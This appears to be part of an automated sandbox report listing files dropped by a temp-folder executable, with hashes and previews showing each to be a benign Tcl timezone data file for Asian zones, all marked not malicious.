                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Barnaul) {. {-9223372036854775808 20100 0 LMT}. {-1579844100 21600 0 +06}. {-1247551200 25200 0 +08}. {354906000 28800 1 +08}. {370713600 25200 0 +07}. {386442000 28800 1 +08}. {402249600 25200 0 +07}. {417978000 28800 1 +08}. {433785600 25200 0 +07}. {449600400 28800 1 +08}. {465332400 25200 0 +07}. {481057200 28800 1 +08}. {496782000 25200 0 +07}. {512506800 28800 1 +08}. {528231600 25200 0 +07}. {543956400 28800 1 +08}. {559681200 25200 0 +07}. {575406000 28800 1 +08}. {591130800 25200 0 +07}. {606855600 28800 1 +08}. {622580400 25200 0 +07}. {638305200 28800 1 +08}. {654634800 25200 0 +07}. {670359600 21600 0 +07}. {670363200 25200 1 +07}. {686088000 21600 0 +06}. {695764800 25200 0 +08}. {701809200 28800 1 +08}. {717534000 25200 0 +07}. {733258800 28800 1 +08}. {748983600 25200 0 +07}. {764708400 28800 1 +08}. {780433200 2
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7754
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6329631010207892
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:OnQv8iPC28v82K/w1VxDmsCZgV+f7dIWDkLDo1WlqCTpXxcKvjRQZwtPEWRTvS4y:OQjPCL5VxKWC7dIWDkLDoqphsX
                                                                                                                                                                                                                                                                                                                                MD5:2D3AE4AD36BD5F302F980EB5F1DD0E4A
                                                                                                                                                                                                                                                                                                                                SHA1:02244056D6D4EC57937D1E187CC65E8FD18F67F0
                                                                                                                                                                                                                                                                                                                                SHA-256:E9DD371FA47F8EF1BE04109F0FD3EBD9FC5E2B0A12C0630CDD20099C838CBEBB
                                                                                                                                                                                                                                                                                                                                SHA-512:2E4528254102210B8A9A2263A8A8E72774D40F57C2431C2DD6B1761CD91FB6CEA1FAD23877E1E2D86217609882F3605D7FE477B771A398F91F8D8AD3EAF90BAC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Beirut) {. {-9223372036854775808 8520 0 LMT}. {-2840149320 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1473645600 10800 1 EEST}. {-1460948400 7200 0 EET}. {-399866400 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336794400 10800 1 EEST}. {-323578800 7200 0 EET}. {-305172000 10800 1 EEST}. {-291956400 7200 0 EET}. {-273636000 10800 1 EEST}. {-260420400 7200 0 EET}. {78012000 10800 1 EEST}. {86734800 7200 0 EET}. {105055200 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {212965200 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EE
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1611
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.653654369590701
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQge4/SsOXEFCMiq90DIgb5j6gMJR/4TJTXSATolS+WSP7VSzlBSkhFSblDSDOQy:5qFqq9iTVrX2ioerAYabcivcnXKh
                                                                                                                                                                                                                                                                                                                                MD5:1A3A4825B73F11024FD21F94AE85F9D2
                                                                                                                                                                                                                                                                                                                                SHA1:E63443CC267B43EFEFFD1E3161293217526E7DC8
                                                                                                                                                                                                                                                                                                                                SHA-256:D8205F34BB8B618E2F8B4EB6E613BE1B5CFBBF3B6CBFAFE868644E1A1648C164
                                                                                                                                                                                                                                                                                                                                SHA-512:5C766BD6FB6195BEBD7CDF703B7E0A67FBB2BCF98052866AE9ACDC5B90469421508F52C60F22542BBA6ED8CC59B4889F20DB131B183918592139B6D135BC57A2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bishkek) {. {-9223372036854775808 17904 0 LMT}. {-1441169904 18000 0 +05}. {-1247547600 21600 0 +06}. {354909600 25200 1 +06}. {370717200 21600 0 +06}. {386445600 25200 1 +06}. {402253200 21600 0 +06}. {417981600 25200 1 +06}. {433789200 21600 0 +06}. {449604000 25200 1 +06}. {465336000 21600 0 +06}. {481060800 25200 1 +06}. {496785600 21600 0 +06}. {512510400 25200 1 +06}. {528235200 21600 0 +06}. {543960000 25200 1 +06}. {559684800 21600 0 +06}. {575409600 25200 1 +06}. {591134400 21600 0 +06}. {606859200 25200 1 +06}. {622584000 21600 0 +06}. {638308800 25200 1 +06}. {654638400 21600 0 +06}. {670363200 18000 0 +05}. {670366800 21600 1 +05}. {683586000 18000 0 +05}. {703018800 21600 1 +05}. {717530400 18000 0 +05}. {734468400 21600 1 +05}. {748980000 18000 0 +05}. {765918000 21600 1 +05}. {780429600 18000 0 +05}. {797367600 2
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.792958708451203
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKXeAMMkEXGm2OHCQdvVVvUWUOVFW/FvOVSSC/FiUMWfV1S:SlSWB9X52wK0bm2OHCIvVVXUuW/MVSSV
                                                                                                                                                                                                                                                                                                                                MD5:95EE0EFC01271C3E3195ADC360F832C7
                                                                                                                                                                                                                                                                                                                                SHA1:CDFA243F359AC5D2FA22032BF296169C8B2B942A
                                                                                                                                                                                                                                                                                                                                SHA-256:241C47769C689823961D308B38D8282F6852BC0511E7DC196BF6BF4CFADBE401
                                                                                                                                                                                                                                                                                                                                SHA-512:11CAE9804EF933A790F5B9B86CC03C133DBD1DB97FAA78F508D681662AAC3714B93166B596F248799FC5B86344B48764865D3371427119999CB02963C98E15C3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Brunei) {. {-9223372036854775808 27580 0 LMT}. {-1383464380 27000 0 +0730}. {-1167636600 28800 0 +08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.721946029615065
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq864DdVAIgN1EF2WFKh0s+WFKvvn:SlSWB9IZaM3ya4DdVAIgo2wKN+wKvv
                                                                                                                                                                                                                                                                                                                                MD5:A967F010A398CD98871E1FF97F3E48AC
                                                                                                                                                                                                                                                                                                                                SHA1:6C8C0AF614D6789CD1F9B6243D26FAC1F9B767EF
                                                                                                                                                                                                                                                                                                                                SHA-256:B07250CD907CA11FE1C94F1DCCC999CECF8E9969F74442A9FCC00FC48EDE468B
                                                                                                                                                                                                                                                                                                                                SHA-512:67E3207C8A63A5D8A1B7ED1A62D57639D695F9CD83126EB58A70EF076B816EC5C4FDBD23F1F32A4BB6F0F9131D30AF16B56CD92B1C42C240FD886C81BA8940DA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kolkata)]} {. LoadTimeZoneFile Asia/Kolkata.}.set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2014
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6060921590827193
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQyeCXQS6oziDpiKXtyiyzilUBinUijiRziiiaSiYzYWk2HgQiMhNIziPiRikiAF:5c/9InX4n7m84nPIzOtfjQhGTNw
                                                                                                                                                                                                                                                                                                                                MD5:A3FB98DC18AC53AE13337F3CC1C4CE68
                                                                                                                                                                                                                                                                                                                                SHA1:F0280D5598AEB6B6851A8C2831D4370E27121B5F
                                                                                                                                                                                                                                                                                                                                SHA-256:D0A984F2EDB6A5A4E3C3CFA812550782F6B34AD0C79B1DD742712EBA14B7B9FB
                                                                                                                                                                                                                                                                                                                                SHA-512:A33E2E0EA093BB758539A761B4CF82204699BC35950ACD329DA9205A141469930CAF179E4331DF505408C7C4F97480416DC16C7E93E53B12392509E5A093E562
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Chita) {. {-9223372036854775808 27232 0 LMT}. {-1579419232 28800 0 +08}. {-1247558400 32400 0 +10}. {354898800 36000 1 +10}. {370706400 32400 0 +09}. {386434800 36000 1 +10}. {402242400 32400 0 +09}. {417970800 36000 1 +10}. {433778400 32400 0 +09}. {449593200 36000 1 +10}. {465325200 32400 0 +09}. {481050000 36000 1 +10}. {496774800 32400 0 +09}. {512499600 36000 1 +10}. {528224400 32400 0 +09}. {543949200 36000 1 +10}. {559674000 32400 0 +09}. {575398800 36000 1 +10}. {591123600 32400 0 +09}. {606848400 36000 1 +10}. {622573200 32400 0 +09}. {638298000 36000 1 +10}. {654627600 32400 0 +09}. {670352400 28800 0 +09}. {670356000 32400 1 +09}. {686080800 28800 0 +08}. {695757600 32400 0 +10}. {701802000 36000 1 +10}. {717526800 32400 0 +09}. {733251600 36000 1 +10}. {748976400 32400 0 +09}. {764701200 36000 1 +10}. {780426000 324
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1563
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6863846285633057
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQtZeCjXN1xJq4tyiIHil++lqivEoziHvqil+fiRBiS/BvWjiY2Vizi6Xi4+k8ih:5tFdXJVHpkbvvWr2sv5kPYxwM3N5
                                                                                                                                                                                                                                                                                                                                MD5:799F0221A1834C723E6BBA2D00727156
                                                                                                                                                                                                                                                                                                                                SHA1:569BBC1F20F7157ECF753A8DEB49156B260A96E0
                                                                                                                                                                                                                                                                                                                                SHA-256:02FF47A619BE154A88530BA8C83F5D52277FA8E8F7941C0D33F89161CE1B5503
                                                                                                                                                                                                                                                                                                                                SHA-512:535812754A92E251A9C86C20E3032A6B363F77F6839C95DAD6ED18200ACAA3075E602AD626F50B84EB931D1D33BD0E00CA5AE1D1D95DEBECDE57EE9E65A137DF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Choibalsan) {. {-9223372036854775808 27480 0 LMT}. {-2032933080 25200 0 +07}. {252435600 28800 0 +08}. {417974400 36000 0 +09}. {433778400 32400 0 +09}. {449593200 36000 1 +09}. {465314400 32400 0 +09}. {481042800 36000 1 +09}. {496764000 32400 0 +09}. {512492400 36000 1 +09}. {528213600 32400 0 +09}. {543942000 36000 1 +09}. {559663200 32400 0 +09}. {575391600 36000 1 +09}. {591112800 32400 0 +09}. {606841200 36000 1 +09}. {622562400 32400 0 +09}. {638290800 36000 1 +09}. {654616800 32400 0 +09}. {670345200 36000 1 +09}. {686066400 32400 0 +09}. {701794800 36000 1 +09}. {717516000 32400 0 +09}. {733244400 36000 1 +09}. {748965600 32400 0 +09}. {764694000 36000 1 +09}. {780415200 32400 0 +09}. {796143600 36000 1 +09}. {811864800 32400 0 +09}. {828198000 36000 1 +09}. {843919200 32400 0 +09}. {859647600 36000 1 +09}. {875368800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815975603028152
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtA2WFKh2V7/4WFKdv:SlSWB9IZaM3yMwVAIgE2wKho4wKt
                                                                                                                                                                                                                                                                                                                                MD5:37D7B7C1E435E2539FDD83D71149DD9A
                                                                                                                                                                                                                                                                                                                                SHA1:F4ADE88DDF244BD2FF5B23714BF7449A74907E08
                                                                                                                                                                                                                                                                                                                                SHA-256:78611E8A0EBEBC4CA2A55611FAC1F00F8495CB044B2A6462214494C7D1F5DA6A
                                                                                                                                                                                                                                                                                                                                SHA-512:E0C57229DC76746C6424606E41E10E97F0F08DD2B00659172DA35F3444BF48B4BC7E2F339A10ECC21628A683E2CB8B4FA5945B8AC68C6BAFEA720AFBB88C90C6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.840543487466552
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtA2WFK7LeL9J4WFKdv:SlSWB9IZaM3yMwVAIgE2wK7LUT4wKt
                                                                                                                                                                                                                                                                                                                                MD5:6F21100628DD48B2FF4B1F2AF92E05CB
                                                                                                                                                                                                                                                                                                                                SHA1:B74478D0EC95A577C2A58497692DB293BBD31586
                                                                                                                                                                                                                                                                                                                                SHA-256:DB2C572E039D1A777FFC66558E2BEE46C52D8FE57401436AE18BB4D5892131CE
                                                                                                                                                                                                                                                                                                                                SHA-512:2D3C37790B6A764FE4E1B8BD8EDF1D073D711F59CEA3EC5E6003E481898F7285B42A14E904C3D148422244BB083FBA42C6623DF7DA05923F6145EEE3FD259520
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4006537789533695
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKr+tJm2OHgPZv9tGZjSWV/FSQRpPUrK/F/ND/k5iRVVFSQ9R/U4C/k:MBp52z+mdHgPZvqZj1NjDPh/F/1/Y4vF
                                                                                                                                                                                                                                                                                                                                MD5:4074FBEF7DD0DF48AD74BDAED3106A75
                                                                                                                                                                                                                                                                                                                                SHA1:FB1E5190EAF8BF9B64EED49F115E34926C1EAF53
                                                                                                                                                                                                                                                                                                                                SHA-256:DB6A7EA0DC757706126114BED5E693565938AABFE3DA1670170647CCDE6BE6CD
                                                                                                                                                                                                                                                                                                                                SHA-512:A469C09FA6A1DA1DB140BFFECB931DBC4B2315A13B82FCA8813C93954598D03818323B7DDE1106D1F1D815ED69523361369AF883CA4818CA562D728F7A88D8A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Colombo) {. {-9223372036854775808 19164 0 LMT}. {-2840159964 19172 0 MMT}. {-2019705572 19800 0 +0530}. {-883287000 21600 1 +06}. {-862639200 23400 1 +0630}. {-764051400 19800 0 +0530}. {832962600 23400 0 +0630}. {846266400 21600 0 +06}. {1145039400 19800 0 +0530}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):164
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.733855608307331
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8ntdVAIgN6Ko2WFK1S2WFKwu:SlSWB9IZaM3yHtdVAIgMKo2wKM2wKwu
                                                                                                                                                                                                                                                                                                                                MD5:629FC03B52D24615FB052C84B0F30452
                                                                                                                                                                                                                                                                                                                                SHA1:80D24B1A70FC568AB9C555BD1CC70C17571F6061
                                                                                                                                                                                                                                                                                                                                SHA-256:BD3E4EE002AFF8F84E74A6D53E08AF5B5F2CAF2B06C9E70B64B05FC8F0B6CA99
                                                                                                                                                                                                                                                                                                                                SHA-512:1C912A5F323E84A82D60300F6AC55892F870974D4DEFE0AF0B8F6A87867A176D3F8D66C1A5B11D8560F549D738FFE377DC20EB055182615062D4649BBA011F32
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dhaka)]} {. LoadTimeZoneFile Asia/Dhaka.}.set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8031
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.629699951300869
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:zY75F5VoNVIkbl3IUQZufk0Eej4YWuM0c5/61a7/VGfV8SbU5J3Mirmgs3LmiK:zI75KN+YlgYE+4YWPB6O4in9
                                                                                                                                                                                                                                                                                                                                MD5:202E5950F6324878B0E6FD0056D2F186
                                                                                                                                                                                                                                                                                                                                SHA1:A668D4DC3E73A292728CCE136EFFAC95D5952A81
                                                                                                                                                                                                                                                                                                                                SHA-256:3BB43B71FF807AA3BF6A7F94680FB8BD586A1471218307A6A7A4CE73A5A3A55E
                                                                                                                                                                                                                                                                                                                                SHA-512:5F9A7308E9C08267ECB8D502505EF9B32269D62FA490D6BC01F6927CB8D5B40CA17BB0CDFA3EE78D48C7686EAA7FD266666EB80E54125859F86CADFD7366DB6B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Damascus) {. {-9223372036854775808 8712 0 LMT}. {-1577931912 7200 0 EET}. {-1568592000 10800 1 EEST}. {-1554080400 7200 0 EET}. {-1537142400 10800 1 EEST}. {-1522630800 7200 0 EET}. {-1505692800 10800 1 EEST}. {-1491181200 7200 0 EET}. {-1474243200 10800 1 EEST}. {-1459126800 7200 0 EET}. {-242265600 10800 1 EEST}. {-228877200 7200 0 EET}. {-210556800 10800 1 EEST}. {-197427600 7200 0 EET}. {-178934400 10800 1 EEST}. {-165718800 7200 0 EET}. {-147398400 10800 1 EEST}. {-134269200 7200 0 EET}. {-116467200 10800 1 EEST}. {-102646800 7200 0 EET}. {-84326400 10800 1 EEST}. {-71110800 7200 0 EET}. {-52704000 10800 1 EEST}. {-39488400 7200 0 EET}. {-21168000 10800 1 EEST}. {-7952400 7200 0 EET}. {10368000 10800 1 EEST}. {23583600 7200 0 EET}. {41904000 10800 1 EEST}. {55119600 7200 0 EET}. {73526400 10800 1 EEST}. {86742000 7200 0 EET}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):351
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.345019966462698
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKwfTm2OHEmVFnP9vX+H7UlckVVFSQRL/FG/UPy/UiF/ji/UiF/jWKO:MBp52YfTmdHzdP9P+bcvjRQmmF/j2F/8
                                                                                                                                                                                                                                                                                                                                MD5:F5A6B4C90D50208EF512A728A2A03BB6
                                                                                                                                                                                                                                                                                                                                SHA1:C9D3C712EDABDFCD1629E72AF363CEB2A0E2334E
                                                                                                                                                                                                                                                                                                                                SHA-256:42BF62F13C2F808BEFD2601D668AFE5D49EA417FC1AC5391631C20ED7225FF46
                                                                                                                                                                                                                                                                                                                                SHA-512:64D413D9299436877F287943FF454EB2AFD415D87DE13AACA50E7BD123828D16CFABD679677F36C891024AB53C62695559DAABDECCC127A669C3ECA0F155453B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dhaka) {. {-9223372036854775808 21700 0 LMT}. {-2524543300 21200 0 HMT}. {-891582800 23400 0 +0630}. {-872058600 19800 0 +0530}. {-862637400 23400 0 +0630}. {-576138600 21600 0 +06}. {1230746400 21600 0 +06}. {1245430800 25200 1 +06}. {1262278800 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):226
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.536797249025477
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKCXeLm2OHnBGeVmkNvyvScCVUkP1avScCC:MBp52qXEmdHnBvVDVyHCPP8HCC
                                                                                                                                                                                                                                                                                                                                MD5:54EC6A256F6D636CD98DD48CDF0E48F1
                                                                                                                                                                                                                                                                                                                                SHA1:571244C3D84A8A6EFFE55C787BFBCE7A6014462C
                                                                                                                                                                                                                                                                                                                                SHA-256:88D61A495724F72DA6AB20CC997575F27797589C7B80F2C63C27F84BF1EB8D61
                                                                                                                                                                                                                                                                                                                                SHA-512:EDD67865D3AD3D2F6D1AFFAE35B6B25E2439164E0BEF8E0E819F88F937F896C10EAB513467524DA0A5A2E3D4C78F55EA3F98F25979B8625DFC66801CBBE9301F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dili) {. {-9223372036854775808 30140 0 LMT}. {-1830414140 28800 0 +08}. {-879152400 32400 0 +09}. {199897200 28800 0 +08}. {969120000 32400 0 +09}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):142
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.927936359970315
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKQiXGm2OHvkdvUQK23NVsRYvC:SlSWB9X52wKQZm2OHvsRVNSQC
                                                                                                                                                                                                                                                                                                                                MD5:6CC252314EDA586C514C76E6981EEAEE
                                                                                                                                                                                                                                                                                                                                SHA1:F58C9072FBBA31C735345162F629BB6CAAB9C871
                                                                                                                                                                                                                                                                                                                                SHA-256:8D7409EBC94A817962C3512E07AFF32838B54B939068129C73EBBEEF8F858ED2
                                                                                                                                                                                                                                                                                                                                SHA-512:40BC04B25F16247F9F6569A37D28EDCA1D7FB33586482A990A36B5B148BF7598CF5493D38C4D1CBDF664553302E4D6505D80EB7E7B5B9FB5141CB7F39B99A93D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dubai) {. {-9223372036854775808 13272 0 LMT}. {-1577936472 14400 0 +04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):791
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8859952964866946
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQJeOJSsOXEFCMiq90DIgb5j6gMJR/4TJTi4GDL:51Fqq9iTVuzL
                                                                                                                                                                                                                                                                                                                                MD5:316F527821D632517866A6E7F97365B3
                                                                                                                                                                                                                                                                                                                                SHA1:6F56985AF44E6533778CFB1FC04D206367A6C0BF
                                                                                                                                                                                                                                                                                                                                SHA-256:5A8FFD24FF0E26C99536EB9D3FB308C28B3491042034B187140039B7A5DF6F1F
                                                                                                                                                                                                                                                                                                                                SHA-512:7EA1ABD02CD8461DD91576B5BCB46B6E3AE25F94BC7936DC051C0964F4EA2F55C58CB1FA6C3A82334AAAAFCDBD6D6DBEBE33FB1C7C45FBDCA5EC43FD46A970A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dushanbe) {. {-9223372036854775808 16512 0 LMT}. {-1441168512 18000 0 +05}. {-1247547600 21600 0 +06}. {354909600 25200 1 +06}. {370717200 21600 0 +06}. {386445600 25200 1 +06}. {402253200 21600 0 +06}. {417981600 25200 1 +06}. {433789200 21600 0 +06}. {449604000 25200 1 +06}. {465336000 21600 0 +06}. {481060800 25200 1 +06}. {496785600 21600 0 +06}. {512510400 25200 1 +06}. {528235200 21600 0 +06}. {543960000 25200 1 +06}. {559684800 21600 0 +06}. {575409600 25200 1 +06}. {591134400 21600 0 +06}. {606859200 25200 1 +06}. {622584000 21600 0 +06}. {638308800 25200 1 +06}. {654638400 21600 0 +06}. {670363200 21600 1 +06}. {684363600 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7341
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6266031318601386
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:vPByq7VKviW/naKl9pUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:vPFi//Th2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:997FF37AE5C6E2E13664100C2FBF8E19
                                                                                                                                                                                                                                                                                                                                SHA1:BF59628212564E50BCC5247C534658C8B7CFF0EE
                                                                                                                                                                                                                                                                                                                                SHA-256:639F26A411E298948A4FAC560E218ED7079722FB4E4AAF8CE0688A3BE24868AE
                                                                                                                                                                                                                                                                                                                                SHA-512:41FEF2026A3062ECA62729A555D10F9ABA777CCBE4E907489B74FC91C645E6010ECFABD2ACB4ED652ADF97E0A69935CB2FADA6732744ED3ADA95DD2EB3C08655
                                                                                                                                                                                                                                                                                                                                Malicious:false
